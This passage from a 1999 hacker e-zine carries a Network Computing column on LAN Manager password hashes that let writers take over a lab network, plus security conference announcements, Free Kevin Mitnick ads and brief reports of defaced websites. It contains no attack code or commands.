programmers, and corporations. In 1997, L0pht released their Windows NT
password-auditing tool, L0phtCrack, which quickly became the de facto
standard auditing tool for both government and the commercial sector. On
May 18, 1998, they presented expert testimony to the United States Senate
on government systems security. The L0pht has appeared in Wired Magazine,
Byte Magazine, various academic journals, BBC, The Washington Post, and
numerous other publications. http://www.L0pht.com.
Contact
Network Flight Recorder
Barnaby Page
202.662.1400
barnaby_page@nfr.net L0pht Heavy Industries
http://www.l0pht.com [L0PHT]
press@l0pht.com
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
10.0 A good example of how "Secure" NT really is
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Network Computing via Techweb
http://www.techweb.com/se/directlink.cgi?NWC19990308S0022
March 08, 1999, Issue: 1005
Section: Columnists
With Friends Like These...
Art Wittmann
A couple of freelance writers are working on a story for us about security
auditing and protection. As part of their "research," they decided to see if they
could hack into one of our lab networks. It took them only a few hours to
successfully break into our Windows NT boxes. And from there, they learned
the configuration of our lab networks, the server names and functions, the
operating systems we run and most of the passwords on the key accounts on
our Microsoft Windows NT, Novell NetWare and Unix servers, as well as a
good many of our routers and switches.
Our lab is not run as a mission-critical production network; it isn't meant to be
particularly secure. But we do stay up to date on most service packs and
patches for the major operating systems. So, unless you've taken a very active
stance on security for your network, you should be worried.
Reusing Passwords?
The hacking expertise of these guys is by no means
unique. Plenty of people out there can do what they did, and some can do it
better. While NT has its fair share of vulnerabilities out of the box, there is a
LAN Manager issue that blows the doors wide open. In summary: NT stores
password hashes in a format that is hard to crack by brute-force methods,
and that's a good thing. However, Microsoft has chosen to maintain
compatibility with LAN Manager's password store, and therefore keeps a
second hash of passwords. This table isn't so secure. In fact, brute-force
methods usually can come up with a few passwords in short order.
Within two hours, our hackers had obtained 5,000 of our 5,045 passwords
by brute-forcing them. A few days and millions of keystrokes later, using
those same passwords, they owned the entire network. So, do you use the
same passwords across all platforms?
The problem is exacerbated for smaller shops where a single crew administers
NT, NetWare, Unix and other systems because they tend to use the same
administrator password for all systems under the group's management. For
very obvious reasons, that's a bad idea. Our lab was no exception, and our
hackers quickly infiltrated our NetWare and Unix servers, as well as our
Cisco routers.
Instructions for cleaning up this hole in NT are provided in the Microsoft
Knowledge Base article Q147706. However, doing so may break
applications that still use the LAN Manager hash table. In particular, if you're
still using DOS or Windows 3.1, problems are likely. And if you're running
OS/2 LAN Manager, implementing Microsoft's fix will break compatibility.
From what I've read about this security hole in the writings from the hacker
community, Service Pack 3 contains a number of security fixes that make it
harder to crack passwords. These should be implemented, but regardless,
LANMan compatibility needs to be disabled if you want your NT server to be
secure.
Expect Little Help From Microsoft
Of course, Microsoft doesn't promote the
fact that a security hole exists or that it can be patched. If you're clever enough
to know about it and to ask the right questions, the company will provide a fix.
In my opinion, that's something akin to Ford putting a sticky note on the
bulletin board outside the CEO's office about a little Pinto gas-tank problem
and then claiming that the hazard was adequately publicized.
Finally, you'd think that Windows 2000 would be the perfect place for
Microsoft to rid itself of this problem, wouldn't you? Well, just like me, you'd
be wrong. It turns out that Microsoft is committed to maintaining LANMan
compatibility in Windows 2000 out of the box.
The moral of the story is clear: The onus is on you to protect the integrity of
your systems; Microsoft is not going to go out of its way to help you. You
must dedicate staff to following the security advisories about all your operating
systems; simply looking at the vendor's home pages is not enough. A good
many of the hackers out there publicize the security holes they know about.
It's my advice that you heed them well.
Send your comments on this column to Art Wittmann at
awittmann@nwc.com.
Copyright © 1999 CMP Media Inc.
@HWA
11.0 The Black Hat Briefings Security Conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From the [ISN] list)
Forwarded From: Jeff Moss <jm@defcon.org>
The Black Hat Briefings '99
http://www.blackhat.com/
July 7 - 8th, Las Vegas, Nevada
Computer Security Conference Announcement
Description and Overview
It's late. You're in the office alone, catching up on some system
administration tasks. Behind you, your network servers hum along quietly,
reliably. Life is good. No one can get to your data or disrupt your WAN.
The network is secure. Or is it?
While we could create more fear, uncertainty, and doubt (FUD), we would
rather announce The Black Hat Briefings '99 conference! The Black Hat
Briefings conference series was created to provide in-depth information
about current and potential threats against computer systems by the people
who discover the threats. To do this, we assemble a group of vendor
neutral security professionals and let them talk candidly about the
security problems businesses face and the solutions they see to those
problems. No gimmicks, just straight talk by people who make it their
business to explore the ever-changing security space.
While many conferences focus on information and network security, only The
Black Hat Briefings will put your managers, engineers, and software
programmers face-to-face with today's cutting edge computer security
experts and "underground" security specialists. New for 1999, there will
be three tracks of speaking. The "White Hat" track will inform your CEO
or CIO with no-nonsense information about what issues to be aware of, and
what they can ignore. The two "Black Hat" tracks will provide your
technical staff with nitty-gritty technical information about current and
potential threats to your computer systems.
Only the Black Hat Briefings conference will provide your staff with the
pragmatic tools and knowledge they need to help thwart those lurking in
the shadows of your fire wall or the depths of your company's WAN. The
reality is they are out there [back to the FUD]. The choice is yours--you
can live in fear of them, or you can learn from people like them.
Conference Overview
Spanning two days with three separate tracks, The Black Hat Briefings will
focus on the vital security issues facing organizations with large
Enterprise networks and mixed network operating systems. Topics will
include Intrusion Detection Systems (IDS), Computer Forensics (CF) systems,
Incident Response, Hostile Mobile Code, vulnerability analysis, secure
programming techniques, tool selection for creating and effectively
monitoring your networks, and management issues related to computer
security. You will be put face-to-face with the people developing the
tools used by and against hackers.
This year the Black Hat Briefings has grown to include a separate track
specifically designed for the CEO and CIO. This third track, nicknamed
the "White Hat" track, was developed by the National Computer Security
Center (NCSC) of the National Security Agency. While the other tracks have
a technology focus, this track is for people who have to manage an
organization's security posture. What should you look for when hiring an
outside security consultant? Should you even look outside your
organization? What are the potential security threats? What should you
do to reduce the risk of losses due to computer security incidents? The
"White Hat" track will help you answer these questions.
The Black Hat Briefings has developed a reputation for lively and in-depth
presentations and discussions between "underground" security celebrities,
vendors, and attendees. This year you can expect more visual
demonstrations, more speakers who are authoritative in their fields, and,
as always, an excellent time.
As an added bonus, people who attend The Black Hat Briefings get free
admission to DEF CON 7.0, the largest Hacker convention in the US, held
right after Black Hat in Las Vegas. For more information see the DEFCON
web site at http://www.defcon.org/.
Speakers
Current Speakers include the following.
- Bruce Schneier, author of Blowfish, TwoFish and Applied Cryptography.
- Marcus Ranum, CEO of Network Flight Recorder and designer of the first
commercial fire wall.
- Dominique Brezinski, Network Security Consultant.
- Greg Hoglund, Author of the Asmodeus NT scanner and the Web Trends
security scanner.
- Peter Stephenson, Principal consultant of the Intrusion Management
and Forensics Group.
- The Simple Nomad, of the Nomad Mobile Research Centre
More speakers will be listed as the call for papers ends on March 15th.
Location
The Venetian Resort and Casino Las Vegas, NV
(http://www.venetian.com/)
Registration Costs
Registration costs are $995 US before June 14th 1998.
Late registration fees are $1,195 after June 14th.
You may cancel your registration before July 1st for a full refund.
This fee includes two days of speaking, materials, a reception, and meals.
To register, please visit http://www.blackhat.com/
Sponsors
Secure Computing Corporation (http://www.securecomputing.com/)
The National Computer Security Center (NCSC)
Network Flight Recorder (http://www.nfr.com/)
Counterpane Systems (http://www.counterpane.com/)
Aventail (http://www.aventail.com/)
More Information
email: blackhat@defcon.org with email questions
or visit
http://www.blackhat.com/ for the latest speakers and events listings.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
12.0 CQRE (Secure) Congress and Exhibition
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Detlef [iso-8859-1] Hühnlein" <huehnlein@secunet.de>
***************************************************************
Call for Papers
CQRE [Secure] Congress & Exhibition
Duesseldorf, Germany, Nov. 30 - Dec. 2 1999
---------------------------------------------------------------
provides a new international forum covering most aspects of
information security with a special focus to the role of
information security in the context of rapidly evolving economic
processes.
---------------------------------------------------------------
Deadline for submission of extended abstracts: May 14, 1999
website: http://www.secunet.de/forum/cqre.html
mailing-list: send mailto:cqre@secunet.de
(where the subject is "subscribe" without the quotation marks)
***************************************************************
The "CQRE - secure networking" provides a new international
forum giving a close-up view on information security in the context
of rapidly evolving economic processes. The unprecedented
reliance on computer technology has transformed the previous technical
side-issue "information security" into a management problem
requiring decisions of strategic importance. Hence, the targeted
audience represents decision makers from government, industry,
commercial, and academic communities. If you are developing
solutions to problems relating to the protection of your country's
information infrastructure or a commercial enterprise, consider
submitting a paper to the "CQRE - secure networking" conference.
We are looking for papers and panel discussions covering:
.. electronic commerce
- new business processes
- secure business transactions
- online merchandising
- electronic payment / banking
- innovative applications
.. network security
- virtual private networks
- security aspects in internet utilization
- security aspects in multimedia applications
- intrusion detection systems
.. legal aspects
- digital signatures acts
- privacy and anonymity
- crypto regulation
- liability
.. corporate security
- access control
- secure teleworking
- enterprise key management
- IT-audit
- risk / disaster management
- security awareness and training
- implementation, accreditation, and operation of secure systems in a
government, business, or industry environment
.. security technology
- cryptography
- public key infrastructures
- chip card technology
- biometrics
.. trust management
- evaluation of products and systems
- international harmonization of security evaluation criteria
.. standardization
.. future perspectives
Any other contribution addressing the involvement of IT security in
economic processes will be welcome. Authors are invited to submit
an extended abstract of their contribution to the program chair.
The submissions should be original research results, survey
articles or ``high quality'' case studies and position papers.
Product advertisements are welcome for presentation, but will not
be considered for the proceedings. Manuscripts must be in English,
and not more than 2.000 words. The extended abstracts should be in
a form suitable for anonymous review, with no author names,
affiliations, acknowledgements or obvious references. Contributions
must not be submitted in parallel to any conference or workshop
that has proceedings. Separately, an abstract of the paper with no
more than 200 words and with title, name and addresses (incl. an
E-mail address) of the authors shall be submitted. In the case of
multiple authors the contacting author must be clearly identified.
We strongly encourage electronic submission in Postscript format.
The submissions must be in 11pt format, use standard fonts or
include the necessary fonts. Proposals for panel discussions should
also be sent to the program chair. Panels of interest include those
that present alternative/controversial viewpoints or those that
encourage lively discussions of relevant issues. Panels that are
collections of unrefereed papers will not be considered. Panel
proposals should be a minimum of one page describing the subject
matter, the appropriateness of the panel for this conference and
should identify participants and their respective viewpoints.
mailing list/ web-site:
-----------------------
If you want to receive emails with subsequent Call for Papers and
registration information, please send a brief mail to
cqre@secunet.de. You will find this call for papers and further
information at http://www.secunet.de/forum/cqre.html .
important dates:
----------------
deadline for submission of extended abstracts May 14, 1999
deadline for submission of panel proposals June 1, 1999
notification of acceptance June 25, 1999
deadline for submission of complete papers July 30, 1999
program chair:
--------------
secunet - Security Networks GmbH
c/o Rainer Baumgart
Weidenauer Str. 223 - 225
57076 Siegen
Germany
Tel.: +49-271-48950-15
Fax: +49-271-48950-50
R.Baumgart@secunet.de
program committee:
------------------
Johannes Buchmann (TU Darmstadt)
Dirk Fox (Secorvo)
Walter Fumy (Siemens)
Rüdiger Grimm (GMD)
Helena Handschuh (ENST/Gemplus)
Thomas Hoeren (Uni Muenster)
Pil Joong Lee (POSTECH)
Alfred Menezes (U.o.Waterloo/Certicom)
David Naccache (Gemplus)
Clifford Neumann (USC)
Mike Reiter (Bell Labs)
Matt Robshaw (RSA)
Richard Schlechter (EU-comm.)
Bruce Schneier (Counterpane)
Tsuyoshi Takagi (NTT)
Yiannis Tsiounis (GTE Labs)
Michael Waidner (IBM)
Moti Yung (CERTCO)
Robert Zuccherato (Entrust)
13.0 Canc0n99 the grassroots con for North America
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This promises to be quite the event, even though nothing is carved in
stone yet since it is early days. The tentative dates are Aug 19th-22nd,
"somewhere in the Niagara Falls region" right near the tourist trap.
Several venues are under consideration and the dates are flexible and
may change to suit speaker availability.
We're still looking for people who are willing to speak or who want to
submit papers to be introduced at the c0n, so send in your proposals now
to be sure that you have a space on the schedule.
Papers and talks aside, there will be sightseeing and the opportunity to
party and generally socialize with the younger set. It should prove quite
interesting all around, from professors to "punk ass hax0rs" ;-) Some of
the people may surprise you, and that will be the key to success for this
con. It will be a fun event with tshirts and other giveaways to show you
were there... don't miss out, register in advance and this will probably
be the most fun you can have for a measly $15 Cdn ($10 US). There will be
cd burning parties for linux / bsd cd's etc (byocds). Visit
http://come.to/canc0n99 for up to date news as it becomes available.
For those interested there are pre-con T-Shirts available for $20 Cdn with
the hwa logo (pictures to come on the site). Send in your order requests
to the main email and you will be notified when they are ready to ship.
All proceeds go towards making the con a better event and dj equipment
etc.... this is a NON PROFIT event!!!! We're hoping to break even at best,
so get as many of your friends together as you can and order a cool
T-shirt or preregister for the con and help us make it a huge success.
Vendors welcome see site for details.
SPEAKERS wanted! interested? email us your idea/proposal...
@HWA
14.0 Countering Cyberterrorism
~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
Courtesy of Cryptography List.
Originally From: Clifford Neuman <bcn@ISI.EDU>
Countering Cyber-Terrorism
June 22-23
Marina del Rey, California
A workshop sponsored by the Information Sciences Institute
of the University of Southern California
Call for Participation
Recent studies warn of Cyber-Terrorism and the vulnerability of our
computer systems and infrastructure to attack. These reports identify
damage that determined, knowledgeable, and well-financed adversaries could
inflict on commercial, government, and military systems. Such attacks
would have severe consequences for the public, and in particular the
economy, which has become dependent on computers and communications
infrastructure.
The objective of this workshop is to identify things that should be done
to improve our ability to detect, protect against, contain, neutralize,
mitigate the effects of, and recover from cyber-terrorist attacks.
Participants are sought from the computer security, electronic commerce
and banking, network infrastructure, military, and counter-terrorism
communities, as well as those with experience of cyber-terrorist attacks.
Recommendations may suggest research and development or operational
measures that can be taken. The workshop is NOT a forum for presentation
of the latest security systems, protocols or algorithms. The workshop
will address the strategies, framework, and infrastructure required to
combine and incrementally deploy such technologies to counter the
cyber-terrorist threat.
Attendance will be limited to approximately 25 participants. Participants
will be selected on the basis of submitted position papers that raise
issues for the workshop to discuss, identify threats or countermeasures,
or propose strategies or infrastructure to counter the threat of
cyber-terrorism. Position papers should be four pages or less in length.
Submissions should be sent in e-mail in Word or PDF format, or as ASCII
text to cyber-terrorism-ws@isi.edu.
Please check the web page http://www.isi.edu/cctws for more information,
including a position paper from the organizers which will be available two
weeks prior to the submission deadline.
Important Dates:
Organizer's Paper Available April 5, 1999
Position Papers Due April 19, 1999
Notification of Acceptance May 1, 1999
Revised Position Papers Due May 28, 1999
Position Papers Available on Web June 9
Workshop Dates June 22-23
Organizing Committee:
Bob Balzer, Information Sciences Institute, Balzer@isi.edu
Thomas Longstaff, CERT Coordination Center, tal@cert.org
Don Faatz, the MITRE Corporation, dfaatz@mitre.org
Clifford Neuman, Information Sciences Institute, bcn@isi.edu
@HWA
-=- :. .: -=-
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
H.W Hacked websites Feb 28th-March 7th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
In the last release we mentioned that www.hackernews.com's server was
showing only the directory structure and no site was available, and also
that the www.l0pht.com server was not accepting http requests. Neither
site was indeed hacked; they were both merely down for maintenance, but it
was 'reported' here as a possible hack since I didn't have time to confirm
or deny the report by contacting the admins before the issue went out.
Hope it didn't cause too much of an annoyance to anyone, and my apologies
to both hackernews and the l0pht for any alarmism perceived or imagined
by the report 8-o - Ed
March 11th: Raza-Mexicana cracked the National Commission of Human Rights
web page and replaced it with a political message.
archived by HNN at http://www.hackernews.com/archive/crackarch.html
http://www.cndh.org.mx
March 10th
contributed by Anonymous
Cracked
We have reports that the following sites have been compromised,
some of them by the RAzaMExicana Hackers TEam.
News of these sites was contributed to Help Net Security by Deepcase and
HNN by anonymous
Cracked March 6th/7th
@HWA
_________________________________________________________________________
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others, please send in news site links that
have security news from foreign countries for inclusion in this list,
thanks... - Ed
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news
(r) Cruciphux is a trade mark of Hunted & Wounded Associates
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]